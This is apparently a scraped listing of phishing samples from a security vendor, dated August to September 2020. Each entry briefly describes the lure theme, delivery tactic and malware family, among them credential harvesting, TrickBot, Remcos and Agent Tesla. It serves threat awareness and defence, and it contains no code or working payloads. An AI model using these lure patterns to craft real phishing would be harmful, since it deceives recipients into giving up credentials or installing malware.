PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish uses an image of a PDF document to hide a link to a Pyrogenic Stealer download.

Real Phishing Example: This phish spoofs WeTransfer and delivers links to Microsoft OneDrive-hosted .htm files that harvest email login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 09/02/2020

TACTIC: Link

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: This phish spoofs WeTransfer and delivers links to Microsoft OneDrive-hosted .htm files that harvest email login credentials.

Real Phishing Example: This phish uses Microsoft OneDrive links behind a finance-themed image to deliver a .ace archive containing the NanoCore Remote Access Trojan.

ENVIRONMENTS: Proofpoint

TYPE: NanoCore

POSTED ON: 09/01/2020

TACTIC: Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This phish uses Microsoft OneDrive links behind a finance-themed image to deliver a .ace archive containing the NanoCore Remote Access Trojan.

Real Phishing Example: This finance-themed attack uses a Microsoft Excel attachment with embedded links to a credential harvesting site.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Theft

POSTED ON: 08/31/2020

TACTIC: Attachment-XLSX

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed attack uses a Microsoft Excel attachment with embedded links to a credential harvesting site.

Real Phishing Example: This document-themed phish involves an attack chain that starts with embedded Microsoft OneDrive links leading to a Googleapis domain designed to perform credential harvesting.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 08/31/2020

TACTIC: Link

THEME: Document

PHISHING EXAMPLE DESCRIPTION: This document-themed phish involves an attack chain that starts with embedded Microsoft OneDrive links leading to a Googleapis domain designed to perform credential harvesting.

Real Phishing Example: This notification-themed attack came in 2 flavors: embedded links and Microsoft Word attachments. They both used a VBS script to download TrickBot.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: TrickBot

POSTED ON: 08/31/2020

TACTIC: Attachment-DOC

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: This notification-themed attack came in 2 flavors: embedded links and Microsoft Word attachments. They both used a VBS script to download TrickBot.

Real Phishing Example: This notification-themed attack came in 2 flavors: embedded links and Microsoft Word attachments. They both used a VBS script to download TrickBot.

ENVIRONMENTS: Ironport

TYPE: TrickBot

POSTED ON: 08/31/2020

TACTIC: Attachment-DOC

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: This notification-themed attack came in 2 flavors: embedded links and Microsoft Word attachments. They both used a VBS script to download TrickBot.

Real Phishing Example: This document-themed attack pretends to be from a lawyer but delivers an HTML attachment designed to steal Office 365 credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 08/27/2020

TACTIC: Attachment-HTML

THEME: Document

PHISHING EXAMPLE DESCRIPTION: This document-themed attack pretends to be from a lawyer but delivers an HTML attachment designed to steal Office 365 credentials.

Real Phishing Example: This finance-themed phish delivers a .xz attachment that installs the Agent Tesla Keylogger.

ENVIRONMENTS: Ironport

TYPE: Agent Tesla

POSTED ON: 08/27/2020

TACTIC: Attachment-XZ

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish delivers a .xz attachment that installs the Agent Tesla Keylogger.

Real Phishing Example: This tax-themed phish delivers a URL leading to a credential harvesting site.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 08/27/2020

TACTIC: Link

THEME: Tax

PHISHING EXAMPLE DESCRIPTION: This tax-themed phish delivers a URL leading to a credential harvesting site.

Real Phishing Example: This tax-themed phish delivers a URL leading to a credential harvesting site.

ENVIRONMENTS: Mimecast

TYPE: Credential Theft

POSTED ON: 08/27/2020

TACTIC: Link

THEME: Tax

PHISHING EXAMPLE DESCRIPTION: This tax-themed phish delivers a URL leading to a credential harvesting site.

Real Phishing Example: This reply chain attack delivers a Microsoft PowerPoint Show file with embedded URL shortcut files.

ENVIRONMENTS: Proofpoint

TYPE: URL

POSTED ON: 08/25/2020

TACTIC: Attachment-PPSX

THEME: Reply Chain

PHISHING EXAMPLE DESCRIPTION: This reply chain attack delivers a Microsoft PowerPoint Show file with embedded URL shortcut files.

Real Phishing Example: This reply chain attack delivers a Microsoft PowerPoint Show file with embedded URL shortcut files.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: URL

POSTED ON: 08/25/2020

TACTIC: Attachment-PPSX

THEME: Reply Chain

PHISHING EXAMPLE DESCRIPTION: This reply chain attack delivers a Microsoft PowerPoint Show file with embedded URL shortcut files.

Real Phishing Example: This voicemail-themed phish delivers a .html attachment to perform credential theft.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Theft

POSTED ON: 08/25/2020

TACTIC: Attachment-HTML

THEME: Voicemail

PHISHING EXAMPLE DESCRIPTION: This voicemail-themed phish delivers a .html attachment to perform credential theft.

Real Phishing Example: This finance-themed phish delivers a linked image with a GuLoader to Async Remote Access Trojan attack chain.

ENVIRONMENTS: Proofpoint

TYPE: Async RAT

POSTED ON: 08/25/2020

TACTIC: Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish delivers a linked image with a GuLoader to Async Remote Access Trojan attack chain.

Real Phishing Example: This finance-themed phish delivers a linked image with a GuLoader to Async Remote Access Trojan attack chain.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Async RAT

POSTED ON: 08/25/2020

TACTIC: Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish delivers a linked image with a GuLoader to Async Remote Access Trojan attack chain.

Real Phishing Example: This invoice-themed phish links to GuLoader, which will install Loki Bot.

ENVIRONMENTS: Proofpoint

TYPE: Loki Bot

POSTED ON: 08/24/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish links to GuLoader, which will install Loki Bot.

Real Phishing Example: This finance-themed attack uses a Microsoft Excel attachment to lure the recipient to a credential harvesting site.

ENVIRONMENTS: Ironport

TYPE: Credential Theft

POSTED ON: 08/24/2020

TACTIC: Attachment-XLSX

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed attack uses a Microsoft Excel attachment to lure the recipient to a credential harvesting site.

Real Phishing Example: This document-themed phish delivers a Microsoft Excel attachment with embedded links to a credential harvesting site.

ENVIRONMENTS: Mimecast

TYPE: Credential Theft

POSTED ON: 08/23/2020

TACTIC: Attachment-XLSX

THEME: Document

PHISHING EXAMPLE DESCRIPTION: This document-themed phish delivers a Microsoft Excel attachment with embedded links to a credential harvesting site.

Real Phishing Example: This finance-themed phish included an attached HTML file spoofing a Microsoft login page to steal credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 08/22/2020

TACTIC: Attachment-HTML

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish included an attached HTML file spoofing a Microsoft login page to steal credentials.

Real Phishing Example: This finance-themed phish included an attached HTML file spoofing a Microsoft login page to steal credentials.

ENVIRONMENTS: Symantec

TYPE: Credential Theft

POSTED ON: 08/22/2020

TACTIC: Attachment-HTML

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish included an attached HTML file spoofing a Microsoft login page to steal credentials.

Real Phishing Example: This invoice-themed phish delivers a macro-enabled Microsoft Office document hosted on Google Docs. From there, the macros install the recently discovered BazarBackdoor.

ENVIRONMENTS: Proofpoint

TYPE: BazarBackdoor

POSTED ON: 08/21/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers a macro-enabled Microsoft Office document hosted on Google Docs. From there, the macros install the recently discovered BazarBackdoor.

Real Phishing Example: This invoice-themed phish delivers a macro-enabled Microsoft Office document hosted on Google Docs. From there, the macros install the recently discovered BazarBackdoor.

ENVIRONMENTS: Symantec

TYPE: BazarBackdoor

POSTED ON: 08/21/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish delivers a macro-enabled Microsoft Office document hosted on Google Docs. From there, the macros install the recently discovered BazarBackdoor.

Real Phishing Example: This finance-themed phish delivers GuLoader to download and activate the Remcos Remote Access Trojan.

ENVIRONMENTS: Proofpoint

TYPE: Remcos RAT

POSTED ON: 08/20/2020

TACTIC: Attachment-XXE

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish delivers GuLoader to download and activate the Remcos Remote Access Trojan.

Real Phishing Example: This invoice-themed phish uses an image crafted to look like a PDF document to hide a link to the NetWire malware.

ENVIRONMENTS: Ironport

TYPE: NetWire

POSTED ON: 08/20/2020

TACTIC: Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: This invoice-themed phish uses an image crafted to look like a PDF document to hide a link to the NetWire malware.

Real Phishing Example: This finance-themed attack delivers embedded links to lure the recipient to a credential harvesting site.

ENVIRONMENTS: Symantec

TYPE: Credential Theft

POSTED ON: 08/19/2020

TACTIC: Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed attack delivers embedded links to lure the recipient to a credential harvesting site.

Real Phishing Example: This finance-themed attack delivers embedded links to lure the recipient to a credential harvesting site.

ENVIRONMENTS: Mimecast

TYPE: Credential Theft

POSTED ON: 08/19/2020

TACTIC: Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed attack delivers embedded links to lure the recipient to a credential harvesting site.

Real Phishing Example: This shipping-themed phish uses a .xxe attachment to deliver the Remcos Remote Access Trojan by way of the GuLoader malware held within the delivered archive.

ENVIRONMENTS: Proofpoint

TYPE: Remcos RAT

POSTED ON: 08/19/2020

TACTIC: Attachment-XXE

THEME: Delivery

PHISHING EXAMPLE DESCRIPTION: This shipping-themed phish uses a .xxe attachment to deliver the Remcos Remote Access Trojan by way of the GuLoader malware held within the delivered archive.

Real Phishing Example: This finance-themed phish uses a .xxe attachment to install the Smoke Loader malware.

ENVIRONMENTS: Proofpoint

TYPE: Smoke Loader

POSTED ON: 08/19/2020

TACTIC: Attachment-XXE

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish uses a .xxe attachment to install the Smoke Loader malware.

Real Phishing Example: This document-themed phish promises a hotel reservation confirmation but delivers an encrypted .zip archive designed to install Iced-ID malware.

ENVIRONMENTS: Ironport

TYPE: Iced-ID

POSTED ON: 08/18/2020

TACTIC: Attachment-ZIP

THEME: Document

PHISHING EXAMPLE DESCRIPTION: This document-themed phish promises a hotel reservation confirmation but delivers an encrypted .zip archive designed to install Iced-ID malware.

Real Phishing Example: This finance-themed phish uses a link disguised as a .zip file to lure the recipient into installing the Banload Loader.

ENVIRONMENTS: Ironport

TYPE: Banload

POSTED ON: 08/17/2020

TACTIC: Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed phish uses a link disguised as a .zip file to lure the recipient into installing the Banload Loader.

Real Phishing Example: This German-language, quote-themed phish uses a linked image that looks like a quote but leads to the Agent Tesla Keylogger.

ENVIRONMENTS: Proofpoint

TYPE: Agent Tesla

POSTED ON: 08/17/2020

TACTIC: Link

THEME: Quotation

PHISHING EXAMPLE DESCRIPTION: This German-language, quote-themed phish uses a linked image that looks like a quote but leads to the Agent Tesla Keylogger.

Real Phishing Example: This finance-themed attack delivers the Smoke Loader using a .xxe attachment that will then install both the Remcos and NetWire Remote Access Trojans.

ENVIRONMENTS: Proofpoint

TYPE: Remcos RAT

POSTED ON: 08/17/2020

TACTIC: Attachment-XXE

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: This finance-themed attack delivers the Smoke Loader using a .xxe attachment that will then install both the Remcos and NetWire Remote Access Trojans.

Real Phishing Example: This delivery-themed phish delivers embedded links to lure a recipient into clicking and giving up their credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Theft

POSTED ON: 08/15/2020

TACTIC: Link

THEME: Delivery

PHISHING EXAMPLE DESCRIPTION: This delivery-themed phish delivers embedded links to lure a recipient into clicking and giving up their credentials.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.